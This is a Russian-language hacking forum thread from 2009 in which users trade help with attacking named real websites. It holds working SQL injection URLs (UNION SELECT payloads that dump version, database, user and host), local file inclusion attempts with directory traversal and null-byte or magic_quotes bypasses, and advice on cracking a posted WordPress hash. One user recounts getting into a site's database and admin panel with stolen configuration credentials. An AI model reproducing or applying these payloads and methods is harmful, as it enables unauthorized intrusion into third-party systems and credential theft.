http://site.ru/tv/?prn&ch=1&rubrics[]=1'
есть ли тут инжект?
http://site.ru//tv/?prn&ch=1&rubrics[]=1)+order+by+1--+
http://site.ru/tv/?prn&ch=1&rubrics[]=-1)+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os),5,6,7,8,9,10, 11--+
5.0.22-log:xmlvlru:xmlvlru@80.92.162.206:redhat-linux-gnu
neverdie
14.04.2009, 16:34
народ вот есть много эксплойтов под разны уязвимости... в общем в чем вопрос: я когда сохраняю сплойт например на перл абсолютно не изменяя его ввожу в cmd cd C:\perl\bin
perl sploit.pl
нажимаю enter вроде должен запуститься но пишет ошибку синтаксиса, хз почему, в чем может быть проблема , и так со всеми сплойтами абсолютно, переустановка компилятора не помогла
Jokester
14.04.2009, 17:21
neverdie
Это происходит потому, что в сплоитах с паблика очень часто НАМЕРЕННО сделаны ошибки, обычно мелкие синтаксические, для того, что-бы откровенные нубы не могли им воспользоваться.
Т.е: ищи ошибку , исправляй и юзай :)
PS Только не нужно сюда копипастить сплоит с просьбой найти ошибку, их не для этого там делают
neverdie
14.04.2009, 17:38
хм, ну php я более менее шарю а вот перл хз, ну ошибки это подло )))) а как их находить-то если не оч разбираешься в синтаксисе это ж не html редактировать)
DrAssault
14.04.2009, 18:17
хм, ну php я более менее шарю а вот перл хз, ну ошибки это подло )))) а как их находить-то если не оч разбираешься в синтаксисе это ж не html редактировать)
Тогда тебе не повезло, учи перл...
короче не обессудьте,
вопрос
в форум о хешах не пишу, потому как молчат там все
насколько я знаю, у mysql5 длина 40 байтов . а какая длина у mysql ?
спрашиваю потому что хеши которые я выдрал из 4 версии имеют длину 40
и второй вопрос .
есть сайт . сканирую nmap-ом, диапазон портов не задаю, т.е. должно использоваться сканир. стандартн. портов .
но сканер выдает бесконечный ряд всевозможных открытых портов, среди них есть и
2, 3, 4 , 5 - значные, короче любые . и главное , скан не заканчивается .
как мне нормально отсканировать сайт ? может в опциях указать что-нибудь
Здравствуйте , приятного времени суток
Достал пароль от accaunt'a (Sql-inje.. ) а он с salt.
Подскажите , где можно найти сам код salt'a , на сайте,в каких таблицах или kak он выглядит...
слышал что такое возможно )
ILYAtirtir
14.04.2009, 20:24
насколько я знаю, у mysql5 длина 40 байтов . а какая длина у mysql ?
16
Достал пароль от accaunt'a (Sql-inje.. ) а он с salt.
Подскажите , где можно найти сам код salt'a , на сайте,в каких таблицах или kak он выглядит...
слышал что такое возможно )
Можно поточнее,от форума или откуда-нибудь ещё? И как определил что он с солью?
Krist_ALL
14.04.2009, 20:28
Скажите плз это реально расшифровать?
$P$BMflaNFKYKH0XoK/cqT06vW2dK4VqL1 и чем это вообще зашифровано?
пароль от сайта
пробовал через этот сайт:
https://hashcracking.info/index.php
никаких результатов , поэтому и подумал что он с salt. 04b1abea6597fe097c29ca3aebd16584
Но проста , даже на будущее, kak узнать что это salt, где он может быть ,если это сайт или Форум.
Скажите плз это реально расшифровать?
и чем это вообще зашифровано?
Реально. MD5(Wordpress)
http://insidepro.com/hashes.php (здесь более 100 видов хешей)
mysql5 просто называется mysql5 поддерживается с mysql 4.1 и вобщето он 20 байт а mysql хеш 8 байт
и второй вопрос .
есть сайт . сканирую nmap-ом, диапазон портов не задаю, т.е. должно использоваться сканир. стандартн. портов .
но сканер выдает бесконечный ряд всевозможных открытых портов, среди них есть и
2, 3, 4 , 5 - значные, короче любые . и главное , скан не заканчивается .
как мне нормально отсканировать сайт ? может в опциях указать что-нибудь
ответьте кто-нибудь пожал.
или же дайте ссылку на тему где ответят (железно только)
есть сайт . сканирую nmap-ом, диапазон портов не задаю, т.е. должно использоваться сканир. стандартн. портов .
но сканер выдает бесконечный ряд всевозможных открытых портов, среди них есть и
2, 3, 4 , 5 - значные, короче любые . и главное , скан не заканчивается .
как мне нормально отсканировать сайт ? может в опциях указать что-нибудь
Опции, с которыми ты запускаешь nmap можешь показать? Здесь (http://www.intuit.ru/department/security/secopen/4/7.html) можно почитать про nmap, про типы сканировани и про возможные ситуации.
massovka
15.04.2009, 09:56
У меня такой вопрос где может прятатся пароль от админик сайта, парол который есть в базе даных не подходит! админка писалась вручную есть исходник login.php
<?
include './../cfg.php';
include './../lib/macros.class.php';
include './../lib/mail.class.php';
$sql = "SELECT * FROM ".PREF."admin";
($result = mysql_query($sql)) or die ($sql . ' : ' . mysql_error());
$f = mysql_fetch_array($result);
$login = $f['login'];
$pwd = $f['pwd'];
$email = $f['mail'];
$message = '';
if(isset($_GET['action']) && $_GET['action'] == 'lost_pwd'){
$mail = new mime_mail;
$mail -> from = $_SERVER['HTTP_HOST'];
$mail -> to = $email;
$mail -> subject = "Забыли пароль";
$mail -> body = "Логин :$login\n".
"Пароль:$pwd\n";
// $mail -> print_message("text/plain");
$mail -> send("text/plain");
$message = "<b>Пароль и логин отправлены на Ваш EMail.</b>";
}
function set_values($login="", $password="", $url="") {
session_start();
global $HTTP_SESSION_VARS;
$HTTP_SESSION_VARS['login_admin'] = $login;
$HTTP_SESSION_VARS['password_admin'] = $password;
if ($url) {
header("Location: $url");
exit;
}
}
if (isset($_POST['login_admin']) && isset($_POST['password_admin'])) {
if ($_POST['login_admin']==$login && $_POST['password_admin']==$pwd) {
set_values($_POST['login_admin'], $_POST['password_admin'], "index.php");
}
else {
set_values();
$a = new Macros;
$a -> assign(array(
'MESSAGE' => $message
));
$a->define("templates/login.htm");
$a->parse(0);
print $a->fetch();
exit;
}
}
session_start();
if (isset($HTTP_SESSION_VARS['login_admin']) && isset($HTTP_SESSION_VARS['password_admin'])) {
if ($HTTP_SESSION_VARS['login_admin'] != $login && $HTTP_SESSION_VARS['password_admin']!=$pwd){
set_values();
$a = new Macros;
$a -> assign(array(
'MESSAGE' => $message
));
$a->define("templates/login.htm");
$a->parse(0);
print $a->fetch();
exit;
}
}
else {
set_values();
$a = new Macros;
$a -> assign(array(
'MESSAGE' => $message
));
$a->define("templates/login.htm");
$a->parse(0);
print $a->fetch();
exit;
}
?>
laedafess
15.04.2009, 11:24
include './../cfg.php';
перейди на папку выше, там будет cfg.php, в нем возможно
upd. ой ступил, ему не это надо=(
geezer.code
15.04.2009, 11:32
$sql = "SELECT * FROM ".PREF."admin";
($result = mysql_query($sql)) or die ($sql . ' : ' . mysql_error());
$f = mysql_fetch_array($result);
$login = $f['login'];
$pwd = $f['pwd'];
вот тут :) (может ты не из той таблицы тянешь пасс ы?)
префикс таблицы скорее всего тут include './../cfg.php';
DimOnOID
15.04.2009, 11:33
include './../cfg.php';
перейди на папку выше, там будет cfg.php, в нем возможно
Там будет конфиг подключения к базе лежать...
Что разве не видишь запрос?
$sql = "SELECT * FROM ".PREF."admin";
Тут пароль полюбому..и больше никак..
massovka
15.04.2009, 11:41
Там будет конфиг подключения к базе лежать...
Что разве не видишь запрос?
$sql = "SELECT * FROM ".PREF."admin";
Тут пароль полюбому..и больше никак..
Я то в базу попал смотрю все пароли в
ibf_members_converge потом беру меняю на свой пассворд захожу в сайт/admin и ничего
Я до этого не читал что там и как, но рискну предположить что ты поменял только хеш, но не соль.
непомню табличку, погугли.
DimOnOID
15.04.2009, 11:56
Я то в базу попал смотрю все пароли в
ibf_members_converge потом беру меняю на свой пассворд захожу в сайт/admin и ничего
Я же тебе в личку писал..что это база форума..и что все пароли из этой базы только к форуму...
а в файле cfg.php пароль и логин для подключения к другой базе...где другие таблицы и другие пароли...
massovka
15.04.2009, 12:02
Я же тебе в личку писал..что это база форума..и что все пароли из этой базы только к форуму...
а в файле cfg.php пароль и логин для подключения к другой базе...где другие таблицы и другие пароли...
да я попал в phpAdmin
там всего 2 базы
1-База форума
2-information_schema
в information_schema всего 17 полей я все просмотрел ничего про пароли нет!
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
# Обзор USER_PRIVILEGES
# Обзор VIEWS
Pashkela
15.04.2009, 12:04
2 massovka:
жжошь:))) Я даже не знаю, что сказать на это. Все эти "17 полей", которые на самом деле таблицы, бесполезны и всегда даже пропускаются при дампе базы
DimOnOID
15.04.2009, 12:07
да я попал в phpAdmin
там всего 2 базы
1-База форума
2-information_schema
в information_schema всего 17 полей я все просмотрел ничего про пароли нет!
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
# Обзор USER_PRIVILEGES
# Обзор VIEWS
information_schema это системна бд мускуля 5 ветки...ты там максимум можешь только таблички узнать.колонки..и базды данных..(названия)
Я тебе ещё раз говорю..подключись к базе используя логин и пароль в файле cfg.php
massovka
15.04.2009, 12:09
information_schema это системна бд мускуля 5 ветки...ты там максимум можешь только таблички узнать.колонки..и базды данных..(названия)
Я тебе ещё раз говорю..подключись к базе используя логин и пароль в файле cfg.php
Все спасибо всем наконец получилось оказуется там еще одна база была и все это время я нетам смотрел! что значит чайник :D :D :D :D
прочита пароль и попал в админку
юзер под которого ты зашёл в пма не имеет прав на доступ к таблице админкиверрнее к бд
делай чё демоноид говорит
Всем привет
ПХП иньекциями заинтересовался, нашел кое-что, хотел бы чтобы прояснили:
УРЛ
http://www.server.com/?lang=en
Warning: include(tmpl/en/error.htm) [function.include]: failed to open stream: No such file or directory in C:\Inetpub\wwwroot\server\index.php on line 41
Warning: include() [function.include]: Failed opening 'tmpl/en/error.htm' for inclusion (include_path='.;C:\php5\pear') in C:\Inetpub\wwwroot\server\index.php on line 41
------
http://www.server.com/?lang=http://www.google.com
Warning: include(tmpl/http://www.google.com/error.htm) [function.include]: failed to open stream: Invalid argument in C:\Inetpub\wwwroot\server\index.php on line 41
Warning: include() [function.include]: Failed opening 'tmpl/http://www.google.com/error.htm' for inclusion (include_path='.;C:\php5\pear') in C:\Inetpub\wwwroot\server\index.php on line 41
Выходит, что разрешен инклудинг только локальных файлов?
Pashkela
15.04.2009, 13:10
Выходит, что разрешен инклудинг только локальных файлов?
ага, LFI
...и ТОЛЬКО из директории "tmpl/"?
можно ли еще что-то выцепить или дохлый номер?
Iceangel_
15.04.2009, 13:47
2 4adr0s
нет, можешь подняться выше: ../../../../boot.ini%00
если директива magic_quotes включена, то попробуй обойти http://raz0r.name/articles/null-byte-alternative/
з.ы. 2 Spyder, я знаю, но у меня на практике, в боевых условиях ниразу не выходило, поэтому так и написал
Iceangel_
смотри репу)
меджик квотс обходятся
Я тут пытался провести SQL-inj И у меня не получается, помогите плиз...
Ошибочка id=1'
Так тоже ошибка id=1'--
Потом востановил запрос id=1--
Затем попробовал попробовать id=1+and+1=1-- ошибки нет
id=1+and+1=2-- ошибки нет
И так тоже нет ошибки id=1+group+by+99--
как можно попробовать?
Мде ни текста ошибки,ни хрена...(
Урл вообще в идеале.....
Так тоже ошибка id=1'--
Поставь "+" в конец запроса,может из за отсутсвия пробела дальнейший запрос не обрезаеться(Это лишь предположение,мож скули нет,вообще)
Byrger
если id=1+or+1=1-- и id=1+or+1=2-- разные тогда это скуля
если нет тогда пробуй id=1'+or+1=1-- id=1'+or+1=2--
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-3,3' at line 1
Можно тут что-нибудь сделать?
2 4adr0s
нет, можешь подняться выше: ../../../../boot.ini%00
если директива magic_quotes включена, то попробуй обойти http://raz0r.name/articles/null-byte-alternative/
з.ы. 2 Spyder, я знаю, но у меня на практике, в боевых условиях ниразу не выходило, поэтому так и написал
Неа... все жестко, и мир жесток...
Warning: include(tmpl/../../../../../../../../../../boot.ini/error.htm) [function.include]: failed to open stream: No such file or directory in C:\Inetpub\wwwroot
http://catalog.uvaga.by/model_mark/?go=-1+order+by+1--
DrAssault
16.04.2009, 16:41
http://catalog.uvaga.by/model_mark/?go=-1+order+by+1--
А ты понаблюдай за запросом и поведением ошибки и сам попробуй понять можно или нет:
http://catalog.uvaga.by/model_mark/?go=-1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-3,3' at line 1
http://catalog.uvaga.by/model_mark/?go=-10
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-30,3' at line 1
http://catalog.uvaga.by/model_mark/?go=-100
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-300,3' at line 1
IDW, DrAssault
нету там скули
DrAssault
16.04.2009, 20:08
IDW, DrAssault
нету там скули
Ну как же мы без тебя то не догадались у? Ошибка возникает из за того что значения лимита не может быть отрицательным вот и всё, естественно инъекцией и не пахло, я просто показал человеку как изменяется характер ошибки в результате тех или иных действий, хотелось чтобы он сам мозгами шевельнул, а не ты ему сказал, надеюсь это ясно!!!
Люди есть такая вот проблема:
Если сайт шопа при попытке вывести багнутый столбец:
http://www.*****.co.uk/cart.php?c=-99999245+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,6 3,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79, 80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96 ,97,98,99,100--
Меня редиректит на страничку с картинкой на которой написано:
Sorry shop is turned off.
Помогите, может есть какойто другой способ вывода?
Спасибо
Вывод в тайтле
http://www.groovycart.co.uk/cart.php?c=-9+union+select+1,version(),3,4,5,6,7,8,9,10,1,2,1, 1,1,1,1,1,19,20,1,2,3,24,5,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,5 0,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66, 67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83 ,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,1 00,1,2,3,4,5,6,7,8,9,10,11,12,13--+
DimOnOID
17.04.2009, 02:06
Неа... все жестко, и мир жесток...
Warning: include(tmpl/../../../../../../../../../../boot.ini/error.htm) [function.include]: failed to open stream: No such file or directory in C:\Inetpub\wwwroot
Тебе нужно обрезать error.htm..это можно обрезать нуль байтом..вот так
file.txt%00
Если magic_quotes_gpc ON то тебе нужно юзать замену нулбайту..вот тут описание..http://forum.antichat.ru/thread98525.html Хотя тебе уже давали ссылку....а ты даже не обратил внимание..
Запрос с заменой нул байта будем примерно таким
file.txt...258-266+ точек
Где file.txt это любой файл в директории tmpl
ЧИТАЙ (http://forum.antichat.ru/thread98525.html)
http://www.western.edu/frontpage/archive.php?id=-931+union+select+1,2382,2383,2384,2385/*
где-то фильтр, пилит version() etc, на дает пробиться к from+information_schema
ILYAtirtir
17.04.2009, 20:04
http://www.western.edu/frontpage/archive.php?id=-931+union+select+1,unhex(hex(version())),2383,2384 ,2385/*
ILYAtirtir, хотя бы объяснили человеку почему так! =\
Nosfer, это не фильтр... Это проблемы с кодировкой... Так иногда бывает =\ для устранения этого можно применить как выше написали:
UNHEX(HEX(version())) ну или вместо version() что вы хотите вывести
или
AES_DECRYPT(AES_ENCRYPT(version(),1),1)
А вообще почитайте SQL injection полный FAQ (https://forum.antichat.ru/threadnav43966-1-10.html)
Некоторые вопросы отпадут =)
есть ссылка вида http://site.ru/file=123
Подгружается фаил 123.txt
Как можно попробовать PHP подгрузить?
пробовал %00 он режет %0
пробовал %25 ничего не происходит..
Jokester
18.04.2009, 13:51
пробовал %00 он режет %0
мде, ты как себе это вообще представляешь?
Это не режет %0 а маджик квотс он, поэтому ошибка появляется такая. Обход сдесь:
https://forum.antichat.ru/thread98525.html
если не вышло, то не судьба
DimOnOID
18.04.2009, 14:27
Вообщем есть файл
if(is_file($config['document_root'].'/templates/'.$config['template'].'/before.php')){
include($config['document_root'].'/templates/'.$config['template'].'/before.php');
}
перменные не опред..то есть их можно свободно передать...
Тут возможен только инклуд при Magic OFF ибо функция is_file не уязвима к замене нулл байта...Риальне ли каким нить макаром обмануть is_file ?...
da, ishi temu slipa pro obxod file_exists
naskol'ko ya pomnyu ftp:// rabotaet s is_file, sledovatel'no RFI
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot